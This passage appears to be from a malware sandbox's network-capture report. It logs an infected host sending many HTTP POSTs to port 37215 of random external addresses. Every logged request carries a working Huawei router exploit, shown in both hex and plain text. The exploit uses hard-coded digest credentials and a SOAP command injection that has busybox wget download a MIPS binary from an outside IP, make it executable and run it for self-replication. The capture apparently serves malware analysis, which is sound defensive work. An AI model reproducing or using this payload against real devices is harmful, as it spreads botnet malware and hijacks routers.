6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2418192.168.2.1335536197.229.69.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.798274994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2419192.168.2.1341166197.247.67.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.798405886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2420192.168.2.133828861.26.104.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799199104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2421192.168.2.1348172187.49.56.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799345016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2422192.168.2.1344218197.128.175.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799352884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2423192.168.2.1358778211.164.123.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799458027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2424192.168.2.133702695.93.212.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799480915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2425192.168.2.1350634197.61.181.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799551964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2426192.168.2.135673041.216.21.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799566031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2427192.168.2.1353510197.238.28.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799595118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2428192.168.2.1346762213.153.204.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799609900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
